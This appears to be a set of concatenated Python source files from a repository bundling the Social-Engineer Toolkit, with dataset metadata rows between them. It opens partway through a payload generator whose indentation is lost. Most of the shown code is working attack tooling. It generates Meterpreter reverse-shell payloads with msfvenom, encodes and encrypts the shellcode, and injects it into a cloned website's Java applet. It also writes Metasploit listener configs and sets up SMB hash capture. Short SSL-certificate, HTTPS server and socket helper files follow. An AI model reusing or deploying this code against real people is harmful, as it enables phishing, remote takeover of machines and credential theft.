choice9 = "windows/meterpreter/reverse_http"
# select all ports
if choice9 == "4":
choice9 = "windows/meterpreter/reverse_tcp_allports"
if choice9 == "5":
choice9 = "windows/shell/reverse_tcp"
# check the ipaddr
if ipaddr == "":
# grab ipaddr if not defined
ipaddr = check_options("IPADDR=")
# break out if not needed
if choice9 == "6":
break
shellcode_port = raw_input(setprompt(["4"], "Enter the port number [443]"))
if shellcode_port == "": shellcode_port = "443"
# here we prep our meta config to listen on all
# the ports we want - free hugs all around
filewrite = open("%s/meta_config_multipyinjector" % (userconfigpath), "a")
port_check = check_ports("%s/meta_config_multipyinjector" % (userconfigpath), shellcode_port)
if port_check == False:
filewrite.write("use exploit/multi/handler\nset PAYLOAD %s\nset EnableStageEncoding %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\r\n\r\n" % (choice9, stage_encoding, ipaddr, shellcode_port))
filewrite.close()
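                    # Illustrative example (placeholder values) of one block appended above:
                    #   use exploit/multi/handler
                    #   set PAYLOAD windows/meterpreter/reverse_https
                    #   set LHOST 192.168.1.5
                    #   set LPORT 443
                    #   exploit -j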
if choice1 != "cmd/multi":
if validate_ip(choice2) == False:
if choice9 != "windows/meterpreter/reverse_https":
if choice9 != "windows/meterpreter/reverse_http":
print_status("Possible hostname detected, switching to windows/meterpreter/reverse_https")
choice9 == "windows/meterpreter/reverse_https"
if choice9 == "windows/meterpreter/reverse_tcp_allports":
portnum = "LPORT=1"
# fix port num
if "multipyinject" in choice1:
portnum = shellcode_port
else:
portnum = portnum.replace("LPORT=", "")
# meterpreter reverse_tcp
if choice9 == "windows/meterpreter/reverse_tcp":
shellcode = metasploit_shellcode(choice9, choice2, portnum)
# meterpreter reverse_https
if choice9 == "windows/meterpreter/reverse_https":
shellcode = metasploit_shellcode(choice9, choice2, portnum)
# meterpreter reverse_http
if choice9 == "windows/meterpreter/reverse_http":
shellcode = metasploit_shellcode(choice9, choice2, portnum)
# meterpreter tcp allports
if choice9 == "windows/meterpreter/reverse_tcp_allports":
shellcode = metasploit_shellcode(choice9, choice2, portnum)
# windows shell reverse_tcp
if choice9 == "windows/shell/reverse_tcp":
shellcode = metasploit_shellcode(choice9, choice2, portnum)
if choice1 == "shellcode/pyinject":
shellcode_port = portnum.replace("LPORT=", "")
if validate_ip(choice2) == True:
shellcode = shellcode_replace(choice2, shellcode_port, shellcode)
# here we write out the payload and port for later
# use in powershell injection
payload_options.write(choice9 + " " + portnum + ",")
# break out of the loop if we are only using one
# payload else keep on
if choice1 == "shellcode/pyinject": break
multipyinject_payload += shellcode + ","
if choice1 != "cmd/multi":
# get rid of tail comma
if multipyinject_payload.endswith(","):
multipyinject_payload = multipyinject_payload[:-1]
# if we have multiple payloads, use multi injector
if choice1 == "shellcode/multipyinject":
# we first need to encrypt the payload via AES 256
print_status("Encrypting the shellcode via AES 256 encryption..")
secret = os.urandom(32)
shellcode = encryptAES(secret, multipyinject_payload)
print_status("Dynamic cipher key created and embedded into payload.")
filewrite = open("%s/meterpreter.alpha_decoded" % (userconfigpath), "w")
filewrite.write(shellcode)
filewrite.close()
if choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyinject":
# close the pyinjector file for ports and payload
payload_options.close()
# here we are going to encode the payload via base64
fileopen = open("%s/meterpreter.alpha_decoded" % (userconfigpath), "r")
data = fileopen.read()
if payloadgen != "solo":
                        # base64-encode the shellcode several times; the receiving
                        # stager decodes it the same number of times, so keep the
                        # count at eleven to match the original behaviour
                        data = data.encode("utf-8")
                        for _ in range(11):
                            data = base64.b64encode(data)
                        data = data.decode("utf-8")
filewrite = open("%s/meterpreter.alpha" % (userconfigpath), "w")
filewrite.write(str(data))
filewrite.close()
if choice1 == "shellcode/alphanum":
print_status("Prepping shellcodeexec for delivery..")
if choice1 == "shellcode/pyinject":
print_status("Prepping pyInjector for delivery..")
# prepping multi pyinjector
if choice1 == "shellcode/multipyinject":
print_status("Prepping Multi-pyInjector for delivery..")
# here we obfuscate the binary a little bit
random_string = generate_random_string(3, 3).upper()
if choice1 == "shellcode/alphanum":
fileopen = open("%s/src/payloads/exe/shellcodeexec.binary" % (definepath), "rb").read()
if choice1 == "shellcode/pyinject":
fileopen = open("%s/src/payloads/set_payloads/pyinjector.binary" % (definepath), "rb").read()
if choice1 == "shellcode/multipyinject":
fileopen = open("%s/src/payloads/set_payloads/multi_pyinjector.binary" % (definepath), "rb").read()
# write out the payload
if choice1 == "shellcode/alphanum" or choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyiject":
filewrite = open(userconfigpath + "msf.exe", "wb")
filewrite.write(fileopen)
filewrite.close()
subprocess.Popen("cp %s/shellcodeexec.custom %s/msf.exe 1> /dev/null 2> /dev/null" % (userconfigpath, userconfigpath), shell=True).wait()
# we need to read in the old index.html file because its
# already generated, need to present the alphanum to it
if os.path.isfile("%s/web_clone/index.html" % (userconfigpath)):
fileopen = open("%s/web_clone/index.html" %(userconfigpath), "r")
filewrite = open("%s/web_clone/index.html.new" % (userconfigpath), "w")
fileopen2 = open("%s/meterpreter.alpha" % (userconfigpath), "r")
alpha_shellcode = fileopen2.read().rstrip()
data = fileopen.read()
data = data.replace(
'param name="2" value=""', 'param name="2" value="%s"' % (alpha_shellcode))
if choice1 == "shellcode/multipyinject":
                    secret = base64.b64encode(secret).decode("utf-8")
data = data.replace('param name="10" value=""', 'param name="10" value ="%s"' % (secret))
filewrite.write(str(data))
# close file
filewrite.close()
# rename file
if choice1 == "shellcode/alphanum":
print_status("Prepping website for alphanumeric injection..")
if choice1 == "shellcode/pyinject":
print_status("Prepping website for pyInjector shellcode injection..")
print_status("Base64 encoding shellcode and prepping for delivery..")
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html 1> /dev/null 2> /dev/null" % (userconfigpath, userconfigpath), shell=True).wait()
if choice9 == "windows/meterpreter/reverse_tcp_allports":
portnum = "LPORT=1"
choice3 = "1"
# UPDATE THE SET CONFIG OPTIONS
update_options("PORT=1")
# here we specify the payload name thats stored later on
choice1 = choice9
# write out the payload for powershell injection to pick it up if used
filewrite = open(userconfigpath + "metasploit.payload", "w")
filewrite.write(choice1)
filewrite.close()
# import if on
setshell_counter = 0
powershell = check_config("POWERSHELL_INJECTION=")
if powershell.lower() == "on" or powershell.lower() == "yes":
if choice1 == "set/reverse_shell" or choice1 == "RATTE":
print_status("Please note that the SETSHELL and RATTE are not compatible with the powershell injection technique. Disabling the powershell attack.")
setshell_counter = 1
if setshell_counter == 0:
if custom == 0: # or choice1 != "set/reverse_shell" or choice1 != "shellcode/alphanum":
if os.path.isfile("%s/web_clone/index.html" % (userconfigpath)):
if choice1 != "cmd/multi":
try: core.module_reload(src.payloads.powershell.prep)
except: import src.payloads.powershell.prep
if os.path.isfile("%s/x86.powershell" % (userconfigpath)):
fileopen1 = open("%s/x86.powershell" % (userconfigpath), "r")
x86 = fileopen1.read()
x86 = "powershell -ec " + x86
# if we specified option cmd/multi which allows us to enter commands in instead and execute them many times
if choice1 == "cmd/multi":
print_status("This section will allow you to specify your own .txt file which can contain one more multiple commands. In order to execute multiple commands you would enter them in for example: cmd1,cmd2,cmd3,cmd4. In the background the Java Applet will enter in cmd /c 'yourcommands here'. You need to provide a path to the txt file that contains all of your commands or payloads split by commas. If just one, then just use no ,.")
filepath = raw_input("\nEnter the path to the file that contains commands: ")
while 1:
if not os.path.isfile(filepath):
filepath = raw_input("[!] File not found.\nEnter the path again and make sure file is there: ")
if os.path.isfile(filepath): break
x86 = open(filepath, "r").read()
print_status("Multi-command payload delivery for Java Applet selected.")
print_status("Embedding commands into Java Applet parameters...")
print_status("Note that these will be base64-encoded once, regardless of the payload..")
fileopen3 = open("%s/web_clone/index.html" % (userconfigpath), "r")
filewrite = open("%s/web_clone/index.html.new" % (userconfigpath), "w")
data = fileopen3.read()
# encode once, will need to decode later
x86 = x86.encode("utf-8")
                base_encode = base64.b64encode(x86).decode("utf-8")
data = data.replace('param name="5" value=""', 'param name="5" value="%s"' % (base_encode))
data = data.replace('param name="6" value=""', 'param name="6" value="%s"' % (base_encode))
if choice1 == "cmd/multi": data = data.replace('param name="8" value="YES"', 'param name="8" value="NO"')
if choice1 != "cmd/multi":
# check if we don't want to deploy binaries
deploy_binaries = check_config("DEPLOY_BINARIES=")
if deploy_binaries.lower() == "n" or deploy_binaries.lower() == "no":
data = data.replace('param name="8" value="YES"', 'param name="8" value="NO"')
if deploy_binaries.lower() == "y" or deploy_binaries.lower() == "yes":
data = data.replace('param name="8" value="NO"', 'param name="8" value="YES"')
filewrite.write(data)
filewrite.close()
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (userconfigpath, userconfigpath), stdout=subprocess.PIPE, shell=True).wait()
# here we specify the binary to deploy if we are using ones that are
# required to drop binaries
if custom == 1 or choice1 == "set/reverse_shell" or choice1 == "shellcode/alphanum" or choice1 == "cmd/multi":
        fileopen3 = open("%s/web_clone/index.html" % (userconfigpath), "r")
filewrite = open("%s/web_clone/index.html.new" % (userconfigpath), "w")
data = fileopen3.read()
# check if we don't want to deploy binaries
data = data.replace('param name="8" value="NO"', 'param name="8" value="YES"')
filewrite.write(data)
filewrite.close()
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
# specify attack vector as SET interactive shell
if choice1 == "set/reverse_shell":
attack_vector = "set_payload"
# if we have the java attack, multiattack java, and the set interactive
# shell
if attack_vector == "java" or multiattack_java == "on":
if attack_vector != "set_payload":
# pull in the ports from config
port1 = check_config("OSX_REVERSE_PORT=")
# if we are using the multiattack, there will be port
# conflicts, need to scoot it to 8082
if attack_vector == "multiattack":
port1 = "8082"
# deploy nix and linux binaries
if check_config("DEPLOY_OSX_LINUX_PAYLOADS=").lower() == "on":
# if we are using a custom linux/osx payload
if check_config("CUSTOM_LINUX_OSX_PAYLOAD=").lower() == "on":
osx_path = raw_input(
"Enter the path for the custom OSX payload (blank for nothing): ")
lin_path = raw_input(
"Enter the path for the custom Linux payload (blank for nothing): ")
print_status(
"Copying custom payloads into proper directory structure.")
# if we didn't specify blank
if osx_path != "":
while 1:
if not os.path.isfile(osx_path):
print_error(
"File not found, enter the path again.")
osx_path = raw_input(
"Enter the path for the custom OSX payload (blank for nothing): ")
if os.path.isfile(osx_path):
break
if osx_path != "":
# copy the payload
shutil.copyfile(osx_path, userconfigpath + "mac.bin")
# if linux payload
if lin_path != "":
while 1:
if not os.path.isfile(lin_path):
print_error(
"File not found, enter the path again.")
lin_path = raw_input(
"Enter the path for the custom Linux payload (blank for nothing): ")
if os.path.isfile(lin_path):
break
if lin_path != "":
# copy the payload
shutil.copyfile(lin_path, userconfigpath + "nix.bin")
else:
port2 = check_config("LINUX_REVERSE_PORT=")
osxpayload = check_config("OSX_PAYLOAD_DELIVERY=")
linuxpayload = check_config("LINUX_PAYLOAD_DELIVERY=")
print_status("Generating OSX payloads through Metasploit...")
subprocess.Popen(r"msfvenom -p %s LHOST=%s LPORT=%s --format elf > %s/mac.bin;chmod 755 %s/mac.bin" % (meta_path(), osxpayload, choice2, port1, userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
print_status("Generating Linux payloads through Metasploit...")
subprocess.Popen(r"%smsfvenom -p %s LHOST=%s LPORT=%s --format elf > %s/nix.bin" % (meta_path(), linuxpayload, choice2, port2, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
if multiattack_java == "on":
multiattack.write("OSX=" + str(port1) + "\n")
multiattack.write("OSXPAYLOAD=%s\n" % (osxpayload))
multiattack.write("LINUX=" + str(port2) + "\n")
multiattack.write("LINUXPAYLOAD=%s\n" % (linuxpayload))
osxcheck = check_options("MAC.BIN=")
linuxcheck = check_options("NIX.BIN=")
shutil.copyfile(userconfigpath + "mac.bin", userconfigpath + "web_clone/%s" % (osxcheck))
shutil.copyfile(userconfigpath + "nix.bin", userconfigpath + "web_clone/%s" % (linuxcheck))
# try block here
try:
# if they want a listener, start here
if os.path.isfile("%s/meta_config" % (userconfigpath)):
# if its already created
filewrite = open("%s/meta_config" % (userconfigpath), "a")
if not os.path.isfile("%s/meta_config" % (userconfigpath)):
# if we need to create it
filewrite = open("%s/meta_config" % (userconfigpath), "w")
# if there isn't a multiattack metasploit, setup handler
if not os.path.isfile("%s/multi_meta" % (userconfigpath)):
port_check = check_ports("%s/meta_config" % (userconfigpath), choice3)
if port_check == False:
filewrite.write("use exploit/multi/handler\n")
filewrite.write("set PAYLOAD " + choice1 + "\n")
filewrite.write("set LHOST " + ipaddr + "\n")
if flag == 0:
filewrite.write("set LPORT " + choice3 + "\n")
filewrite.write("set EnableStageEncoding %s\n" %
(stage_encoding))
filewrite.write("set ExitOnSession false\n")
if auto_migrate == "ON":
filewrite.write(
"set AutoRunScript post/windows/manage/smart_migrate\n")
# config option for using multiscript meterpreter
if meterpreter_multi == "ON":
multiwrite = open(userconfigpath + "multi_meter.file", "w")
multiwrite.write(meterpreter_multi_command)
filewrite.write(
"set InitialAutorunScript multiscript -rc %s/multi_meter.file\n" % (userconfigpath))
multiwrite.close()
filewrite.write("exploit -j\r\n\r\n")
# if we want to embed UNC paths for hashes
if unc_embed == "ON":
filewrite.write("use server/capture/smb\n")
filewrite.write("exploit -j\r\n\r\n")
# if only doing payloadgen then close the stuff up
if payloadgen == "solo":
filewrite.close()
# Define linux and OSX payloads
if payloadgen == "regular":
if check_config("DEPLOY_OSX_LINUX_PAYLOADS=").lower() == "on":
filewrite.write("use exploit/multi/handler\n")
filewrite.write(
"set PAYLOAD osx/x86/shell_reverse_tcp" + "\n")
filewrite.write("set LHOST " + choice2 + "\n")
filewrite.write("set LPORT " + port1 + "\n")
filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j\r\n\r\n")
filewrite.write("use exploit/multi/handler\n")
filewrite.write(
"set PAYLOAD linux/x86/shell/reverse_tcp" + "\n")
filewrite.write("set LHOST " + choice2 + "\n")
filewrite.write("set LPORT " + port2 + "\n")
if linux_meterpreter_multi == "ON":
multiwrite = open(
userconfigpath + "lin_multi_meter.file", "w")
multiwrite.write(linux_meterpreter_multi_command)
filewrite.write(
"set InitialAutorunScript multiscript -rc %s/lin_multi_meter.file\n" % (userconfigpath))
multiwrite.close()
filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j\r\n\r\n")
filewrite.close()
except Exception as e:
log(e)
print_error("ERROR:Something went wrong:")
print(bcolors.RED + "ERROR:" + str(e) + bcolors.ENDC)
# Catch all errors
except KeyboardInterrupt:
print_warning("Keyboard Interrupt Detected, exiting Payload Gen")
# finish closing up the remenant files
if attack_vector == "multiattack":
multiattack.close()
if os.path.isfile("%s/fileformat.file" % (userconfigpath)):
filewrite = open("%s/payload.options" % (userconfigpath), "w")
filewrite.write(choice1 + " " + ipaddr + " " + choice3)
filewrite.close()
if choice1 == "set/reverse_shell":
if os.path.isfile(userconfigpath + "meta_config"):
os.remove(userconfigpath + "meta_config")
| 40,269 | Python | .py | 686 | 40.225948 | 459 | 0.522181 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,846 | solo.py | CHEGEBB_africana-framework/externals/set/src/core/payloadgen/solo.py | #!/usr/bin/env python3
import subprocess
from src.core.setcore import *
from src.core.menu.text import *
from src.core.dictionaries import *
# definepath
definepath = os.getcwd()
sys.path.append(definepath)
# grab the metasploit path
meta_path = meta_path()
# here we handle our main payload generation
def payload_generate(payload, lhost, port):
# generate metasploit
subprocess.Popen(meta_path + "msfvenom -p %s LHOST=%s LPORT=%s --format=exe > %s/payload.exe" %
(payload, lhost, port, userconfigpath), stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True).wait()
# write out the rc file
filewrite = open(userconfigpath + "meta_config", "w")
filewrite.write(
"use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\r\n\r\n" % (payload, lhost, port))
filewrite.close()
print_status(
"Payload has been exported to the default SET directory located under: " + userconfigpath + "payload.exe")
show_payload_menu2 = create_menu(payload_menu_2_text, payload_menu_2)
payload = (raw_input(setprompt(["4"], "")))
# if its default then select meterpreter
if payload == "":
payload = "2"
# assign the right payload
payload = ms_payload(payload)
lhost = raw_input(
setprompt(["4"], "IP address for the payload listener (LHOST)"))
port = raw_input(setprompt(["4"], "Enter the PORT for the reverse listener"))
# print to user that payload is being generated
print_status("Generating the payload.. please be patient.")
# generate the actual payload
payload_generate(payload, lhost, port)
# check options to see if we are using the infectious media generator
if check_options("INFECTION_MEDIA=") != "ON":
# start the payload for the user
payload_query = raw_input(setprompt(
["4"], "Do you want to start the payload and listener now? (yes/no)"))
if payload_query.lower() == "y" or payload_query.lower() == "yes":
print_status(
"Launching msfconsole, this could take a few to load. Be patient...")
subprocess.Popen(meta_path + "msfconsole -r " +
userconfigpath + "meta_config", shell=True).wait()
| 2,183 | Python | .py | 46 | 43.152174 | 142 | 0.701079 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,847 | setssl.py | CHEGEBB_africana-framework/externals/set/src/core/ssl/setssl.py | #!/usr/bin/env python3
#
# Quick SSL Cert creation method
#
# Used if you want to create self signed
from src.core.setcore import *
import subprocess
import os
definepath = os.getcwd()
os.chdir(userconfigpath)
# create the directories for us
subprocess.Popen("mkdir CA;cd CA;mkdir newcerts private", shell=True).wait()
# move into CA directory
os.chdir("CA/")
# create necessary files
subprocess.Popen("echo '01' > serial;touch index.txt", shell=True).wait()
filewrite = open("openssl.cnf", "w")
filewrite.write("""#
# OpenSSL configuration file.
#
# Establish working directory.
dir = .
[ req ]
default_bits = 1024 # Size of keys
default_keyfile = key.pem # name of generated keys
default_md = md5 # message digest algorithm
string_mask = nombstr # permitted characters
distinguished_name = req_distinguished_name
[ req_distinguished_name ]
# Variable name Prompt string
#---------------------- ----------------------------------
0.organizationName = Organization Name (company)
organizationalUnitName = Organizational Unit Name (department, division)
emailAddress = Email Address
emailAddress_max = 40
localityName = Locality Name (city, district)
stateOrProvinceName = State or Province Name (full name)
countryName = Country Name (2 letter code)
countryName_min = 2
countryName_max = 2
commonName = Common Name (hostname, IP, or your name)
commonName_max = 64
# Default values for the above, for consistency and less typing.
# Variable name Value
#------------------------------ ------------------------------
0.organizationName_default = The Sample Company
localityName_default = Metropolis
stateOrProvinceName_default = New York
countryName_default = US
[ v3_ca ]
basicConstraints = CA:TRUE
subjectKeyIdentifier = hash
authorityKeyIdentifier = keyid:always,issuer:always""")
# close editing of the file
filewrite.close()
subprocess.Popen(
"openssl req -new -x509 -extensions v3_ca -keyout private/cakey.pem -out newcert.pem -days 3650 -config ./openssl.cnf", shell=True).wait()
subprocess.Popen(
"cp private/cakey.pem newreq.pem;cp *.pem ../", shell=True).wait()
os.chdir(definepath)
| 2,111 | Python | .py | 60 | 33.966667 | 142 | 0.737537 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,848 | PoC_SSL.py | CHEGEBB_africana-framework/externals/set/src/core/ssl/PoC_SSL.py | #!/usr/bin/env python3
import socket
import os
from socketserver import BaseServer
from http.server import HTTPServer
from http.server import SimpleHTTPRequestHandler
from OpenSSL import SSL
class SecureHTTPServer(HTTPServer):
def __init__(self, server_address, HandlerClass):
BaseServer.__init__(self, server_address, HandlerClass)
ctx = SSL.Context(SSL.SSLv23_METHOD)
# server.pem's location (containing the server private key and
# the server certificate).
fpem_priv = 'newreq.pem' # server
fpem_cli = 'newcert.pem' # cli
ctx.use_privatekey_file(fpem_priv)
ctx.use_certificate_file(fpem_cli)
self.socket = SSL.Connection(ctx, socket.socket(self.address_family,
self.socket_type))
self.server_bind()
self.server_activate()
def shutdown_request(self, request): request.shutdown()
class SecureHTTPRequestHandler(SimpleHTTPRequestHandler):
    def setup(self):
        self.connection = self.request
        # socket._fileobject was removed in Python 3; makefile() is the usual
        # replacement (this assumes the wrapped SSL connection supports it)
        self.rfile = self.connection.makefile("rb", self.rbufsize)
        self.wfile = self.connection.makefile("wb", self.wbufsize)
def main_server(HandlerClass=SecureHTTPRequestHandler,
ServerClass=SecureHTTPServer):
server_address = ('', 443) # (address, port)
httpd = ServerClass(server_address, HandlerClass)
sa = httpd.socket.getsockname()
print("Serving HTTPS on", sa[0], "port", sa[1], "...")
if __name__ == '__main__':
main_server()
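# Quick smoke test (illustrative; assumes newreq.pem/newcert.pem are in the working
# directory and the script can bind port 443):
#   curl -k https://127.0.0.1/
# The -k flag is needed because the certificate is self-signed.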
| 1,559 | Python | .py | 35 | 37.085714 | 76 | 0.674373 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,849 | socket.py | CHEGEBB_africana-framework/externals/set/src/core/patched/socket.py | # Wrapper module for _socket, providing some additional facilities
# implemented in Python.
"""\
This module provides socket operations and some related functions.
On Unix, it supports IP (Internet Protocol) and Unix domain sockets.
On other systems, it only supports IP. Functions specific for a
socket are available as methods of the socket object.
Functions:
socket() -- create a new socket object
socketpair() -- create a pair of new socket objects [*]
fromfd() -- create a socket object from an open file descriptor [*]
gethostname() -- return the current hostname
gethostbyname() -- map a hostname to its IP number
gethostbyaddr() -- map an IP number or hostname to DNS info
getservbyname() -- map a service name and a protocol name to a port number
getprotobyname() -- map a protocol name (e.g. 'tcp') to a number
ntohs(), ntohl() -- convert 16, 32 bit int from network to host byte order
htons(), htonl() -- convert 16, 32 bit int from host to network byte order
inet_aton() -- convert IP addr string (123.45.67.89) to 32-bit packed format
inet_ntoa() -- convert 32-bit packed format IP to string (123.45.67.89)
ssl() -- secure socket layer support (only available if configured)
socket.getdefaulttimeout() -- get the default timeout value
socket.setdefaulttimeout() -- set the default timeout value
create_connection() -- connects to an address, with an optional timeout and
optional source address.
[*] not available on all platforms!
Special objects:
SocketType -- type object for socket objects
error -- exception raised for I/O errors
has_ipv6 -- boolean value indicating if IPv6 is supported
Integer constants:
AF_INET, AF_UNIX -- socket domains (first argument to socket() call)
SOCK_STREAM, SOCK_DGRAM, SOCK_RAW -- socket types (second argument)
Many other constants may be defined; these may be used in calls to
the setsockopt() and getsockopt() methods.
"""
import _socket
from _socket import *
from functools import partial
from types import MethodType
try:
import _ssl
except ImportError:
# no SSL support
pass
else:
def ssl(sock, keyfile=None, certfile=None):
# we do an internal import here because the ssl
# module imports the socket module
import ssl as _realssl
warnings.warn("socket.ssl() is deprecated. Use ssl.wrap_socket() instead.",
DeprecationWarning, stacklevel=2)
return _realssl.sslwrap_simple(sock, keyfile, certfile)
# we need to import the same constants we used to...
from _ssl import SSLError as sslerror
from _ssl import \
RAND_add, \
RAND_egd, \
RAND_status, \
SSL_ERROR_ZERO_RETURN, \
SSL_ERROR_WANT_READ, \
SSL_ERROR_WANT_WRITE, \
SSL_ERROR_WANT_X509_LOOKUP, \
SSL_ERROR_SYSCALL, \
SSL_ERROR_SSL, \
SSL_ERROR_WANT_CONNECT, \
SSL_ERROR_EOF, \
SSL_ERROR_INVALID_ERROR_CODE
import os, sys, warnings
from io import StringIO
try:
import errno
except ImportError:
errno = None
EBADF = getattr(errno, 'EBADF', 9)
EINTR = getattr(errno, 'EINTR', 4)
__all__ = ["getfqdn", "create_connection"]
__all__.extend(os._get_exports_list(_socket))
_realsocket = socket
# WSA error codes
if sys.platform.lower().startswith("win"):
errorTab = {}
errorTab[10004] = "The operation was interrupted."
errorTab[10009] = "A bad file handle was passed."
errorTab[10013] = "Permission denied."
errorTab[10014] = "A fault occurred on the network??" # WSAEFAULT
errorTab[10022] = "An invalid operation was attempted."
errorTab[10035] = "The socket operation would block"
errorTab[10036] = "A blocking operation is already in progress."
errorTab[10048] = "The network address is in use."
errorTab[10054] = "The connection has been reset."
errorTab[10058] = "The network has been shut down."
errorTab[10060] = "The operation timed out."
errorTab[10061] = "Connection refused."
errorTab[10063] = "The name is too long."
errorTab[10064] = "The host is down."
errorTab[10065] = "The host is unreachable."
__all__.append("errorTab")
def getfqdn(name=''):
"""Get fully qualified domain name from name.
An empty argument is interpreted as meaning the local host.
First the hostname returned by gethostbyaddr() is checked, then
possibly existing aliases. In case no FQDN is available, hostname
from gethostname() is returned.
"""
name = name.strip()
if not name or name == '0.0.0.0':
name = gethostname()
try:
hostname, aliases, ipaddrs = gethostbyaddr(name)
except error:
pass
else:
aliases.insert(0, hostname)
for name in aliases:
if '.' in name:
break
else:
name = hostname
return name
_socketmethods = (
'bind', 'connect', 'connect_ex', 'fileno', 'listen',
'getpeername', 'getsockname', 'getsockopt', 'setsockopt',
'sendall', 'setblocking',
'settimeout', 'gettimeout', 'shutdown')
if os.name == "nt":
_socketmethods = _socketmethods + ('ioctl',)
if sys.platform == "riscos":
_socketmethods = _socketmethods + ('sleeptaskw',)
# All the method names that must be delegated to either the real socket
# object or the _closedsocket object.
_delegate_methods = ("recv", "recvfrom", "recv_into", "recvfrom_into",
"send", "sendto")
class _closedsocket(object):
__slots__ = []
def _dummy(*args):
raise error(EBADF, 'Bad file descriptor')
# All _delegate_methods must also be initialized here.
send = recv = recv_into = sendto = recvfrom = recvfrom_into = _dummy
__getattr__ = _dummy
# Wrapper around platform socket objects. This implements
# a platform-independent dup() functionality. The
# implementation currently relies on reference counting
# to close the underlying socket object.
class _socketobject(object):
__doc__ = _realsocket.__doc__
__slots__ = ["_sock", "__weakref__"] + list(_delegate_methods)
def __init__(self, family=AF_INET, type=SOCK_STREAM, proto=0, _sock=None):
if _sock is None:
_sock = _realsocket(family, type, proto)
self._sock = _sock
for method in _delegate_methods:
setattr(self, method, getattr(_sock, method))
def close(self, _closedsocket=_closedsocket,
_delegate_methods=_delegate_methods, setattr=setattr):
# This function should not reference any globals. See issue #808164.
self._sock = _closedsocket()
dummy = self._sock._dummy
for method in _delegate_methods:
setattr(self, method, dummy)
close.__doc__ = _realsocket.close.__doc__
def accept(self):
sock, addr = self._sock.accept()
return _socketobject(_sock=sock), addr
accept.__doc__ = _realsocket.accept.__doc__
def dup(self):
"""dup() -> socket object
Return a new socket object connected to the same system resource."""
return _socketobject(_sock=self._sock)
def makefile(self, mode='r', bufsize=-1):
"""makefile([mode[, bufsize]]) -> file object
Return a regular file object corresponding to the socket. The mode
and bufsize arguments are as for the built-in open() function."""
return _fileobject(self._sock, mode, bufsize)
family = property(lambda self: self._sock.family, doc="the socket family")
type = property(lambda self: self._sock.type, doc="the socket type")
proto = property(lambda self: self._sock.proto, doc="the socket protocol")
def meth(name, self, *args):
    return getattr(self._sock, name)(*args)

for _m in _socketmethods:
    # On Python 3, MethodType() takes only two arguments and functools.partial
    # objects are not descriptors, so wrap each delegated call in a plain
    # function that binds normally when looked up on the class.
    def _delegate(self, *args, _name=_m):
        return meth(_name, self, *args)
    _delegate.__name__ = _m
    _delegate.__doc__ = getattr(_realsocket, _m).__doc__
    setattr(_socketobject, _m, _delegate)
socket = SocketType = _socketobject
class _fileobject(object):
"""Faux file object attached to a socket object."""
default_bufsize = 8192
name = "<socket>"
__slots__ = ["mode", "bufsize", "softspace",
# "closed" is a property, see below
"_sock", "_rbufsize", "_wbufsize", "_rbuf", "_wbuf", "_wbuf_len",
"_close"]
def __init__(self, sock, mode='rb', bufsize=-1, close=False):
self._sock = sock
self.mode = mode # Not actually used in this version
if bufsize < 0:
bufsize = self.default_bufsize
self.bufsize = bufsize
self.softspace = False
# _rbufsize is the suggested recv buffer size. It is *strictly*
# obeyed within readline() for recv calls. If it is larger than
# default_bufsize it will be used for recv calls within read().
if bufsize == 0:
self._rbufsize = 1
elif bufsize == 1:
self._rbufsize = self.default_bufsize
else:
self._rbufsize = bufsize
self._wbufsize = bufsize
# We use StringIO for the read buffer to avoid holding a list
# of variously sized string objects which have been known to
# fragment the heap due to how they are malloc()ed and often
# realloc()ed down much smaller than their original allocation.
self._rbuf = StringIO()
self._wbuf = [] # A list of strings
self._wbuf_len = 0
self._close = close
def _getclosed(self):
return self._sock is None
closed = property(_getclosed, doc="True if the file is closed")
def close(self):
try:
if self._sock:
self.flush()
finally:
if self._close:
self._sock.close()
self._sock = None
def __del__(self):
try:
self.close()
except:
# close() may fail if __init__ didn't complete
pass
def flush(self):
if self._wbuf:
data = "".join(self._wbuf)
self._wbuf = []
self._wbuf_len = 0
buffer_size = max(self._rbufsize, self.default_bufsize)
data_size = len(data)
write_offset = 0
view = memoryview(data)
try:
while write_offset < data_size:
self._sock.sendall(view[write_offset:write_offset+buffer_size])
write_offset += buffer_size
finally:
if write_offset < data_size:
remainder = data[write_offset:]
del view, data # explicit free
self._wbuf.append(remainder)
self._wbuf_len = len(remainder)
def fileno(self):
return self._sock.fileno()
def write(self, data):
data = str(data) # XXX Should really reject non-string non-buffers
if not data:
return
self._wbuf.append(data)
self._wbuf_len += len(data)
if (self._wbufsize == 0 or
self._wbufsize == 1 and '\n' in data or
self._wbuf_len >= self._wbufsize):
self.flush()
def writelines(self, list):
# XXX We could do better here for very long lists
# XXX Should really reject non-string non-buffers
lines = [_f for _f in map(str, list) if _f]
self._wbuf_len += sum(map(len, lines))
self._wbuf.extend(lines)
if (self._wbufsize <= 1 or
self._wbuf_len >= self._wbufsize):
self.flush()
def read(self, size=-1):
# Use max, disallow tiny reads in a loop as they are very inefficient.
# We never leave read() with any leftover data from a new recv() call
# in our internal buffer.
rbufsize = max(self._rbufsize, self.default_bufsize)
# Our use of StringIO rather than lists of string objects returned by
# recv() minimizes memory usage and fragmentation that occurs when
# rbufsize is large compared to the typical return value of recv().
